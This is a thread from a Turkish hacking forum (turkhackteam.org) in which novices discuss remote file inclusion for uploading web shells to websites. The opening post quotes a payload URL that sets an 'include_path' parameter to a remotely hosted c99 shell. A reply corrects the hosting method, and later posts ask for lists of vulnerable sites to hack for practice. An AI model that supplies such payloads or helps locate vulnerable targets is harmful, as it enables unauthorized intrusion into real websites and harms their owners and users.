Shell Hakkında Bilgi | File İclude Nedir ? Nasıl Uygulanır |

NightWolf

Emektar
27 Ara 2005
722
11
about:home
YA BEN UPLOAD ETTİM YEDİRMEYE ÇALIŞIRKEN admin/config_settings.tpl.php?include_path=http://rapidshare.com/files/336839187/c99.txt.html?
BUNU kullanıyorum yapılışında bir sorun varmı varsa sölein düzeltip öle yedirmeye çalışıyım


:)

https://tik.lat/xunJ9 şeklinde olmaz rapidshare.com adlı siteye dosta uplaod edersin ama onun üzerinden kullanam yapamazsın sadece indirirsin o dosyayı o yüzden sonuna eklediğin link yanlış.sitemynetten fln sayfa alacan oraya uplaod edeceksin ;)
 

LoTDW

Yeni üye
10 Eyl 2009
28
0
shellerden uyarı alıyorum sürekli neden ki hata bu '' 35 Naahh.. it will not work! ''
file include nasıl yedircez o kodu hpsine kopyalıcaz mı ayrıca o arat dediğini ''I-RATER PLATINUM'' aratınca downlod faln çıkıoyr bunu indircez mi indirceksek nsıl kullancaz
 
Son düzenleme:

mali55

Üye
8 Haz 2009
108
0
ya ben denedim upload olmuo yüklemeye çalıştığınız dosyada form ögeleri olduğundan yüklemesi durdurulmuştur dio
napmam gerek
 

AkrepTR

Yeni üye
18 Tem 2010
5
0
bizim okulda sınıfta kalmak yok :) siz istedikten sonra öğretirim ;)

Sizden tek istediğim arada shell açıklı siteleri koyun yeni başlayanlar da ( bende dahil ) siteye shell falan soksun uğraşsın hacklemeye çalışsın.Videolu dersler falan var çok iyi ama uygulamalı olmadan hiçbir şeye yaramaz diye düşünüyorum:eek:http://www.turkhac
 

maydar789

Yeni üye
12 Ağu 2009
1
0
Shell adresim falan herşey tmm ama gerçekten uygulamyı nasıl yapıcaz açıkları nasıl bulup shelli çakıcaz biraz daha açıklama olsa iyi olur tmm iclude_path= sora shella adresini çakmayı öğrendik amam bu include_path= yazn adresi nasıl öğrenicez AkrepTR nin dediği gibi bize uygulamalı öğretseniz iyi olur amam istediğimiz balık tutmayı öğrenmek hazır balık deil :)
 

fena.

Yeni üye
5 Ağu 2010
6
0
eline sağlık kardeş. yalnız bu açıklı siteleri bulmayı beceremedim ben ya :( bir de siteyi bulduktan sonra sitenin bu "confg"li adresini bulmak kolaydır heralde değil mi?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.